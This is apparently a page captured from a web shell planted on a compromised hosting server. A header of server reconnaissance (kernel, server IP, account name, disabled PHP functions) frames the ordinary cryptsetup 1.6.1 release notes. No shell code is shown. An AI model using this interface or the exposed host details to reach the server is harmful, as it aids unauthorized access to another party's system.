SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

: /usr/share/doc/cryptsetup-2.0.3/ [ drwxr-xr-x ]
Uname\Kernel: Linux server.kxo.bgz.mybluehostin.me 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Server: Apache
PHP Version: 8.2.28 [ PHP INFO ]
Operating System: Linux
Server Ip: 162.240.163.222
Your Ip: 216.73.216.114
Date Time: 2025-07-11 00:57:36
User: dilseshaadi (1027) | Group: dilseshaadi (1027)
Safe Mode: OFF
Disable Function: exec,passthru,shell_exec,system

name : v1.6.1-ReleaseNotes
Cryptsetup 1.6.1 Release Notes
==============================

Changes since version 1.6.0

* Fix loop-AES keyfile parsing.
  Loop-AES keyfile should be text keyfile, reject keyfiles which
  are not properly terminated.

* Fix passphrase pool overflow for too long TCRYPT passphrase.
 (Maximal TCRYPT passphrase length is 64 characters.)

* Return EPERM (translated to exit code 2) for too long TCRYPT passphrase.

* Fix deactivation of device when failed underlying node disappeared.

* Fix API deactivate call for TCRYPT format and NULL context parameter.

* Improve keyslot checker example documentation.

* Report error message if deactivation fails and device is still busy.

* Make passphrase prompts more consistent (and remove "LUKS" form prompt).

* Fix some missing headers (compilation failed with alternative libc).

* Remove not functional API UUID support for plain & loopaes devices.
  (not persistent activation UUID).

* Properly cleanup devices on interrupt in api-test.

* Support all tests run if kernel is in FIPS mode.
© 2025 Faizzz-Chin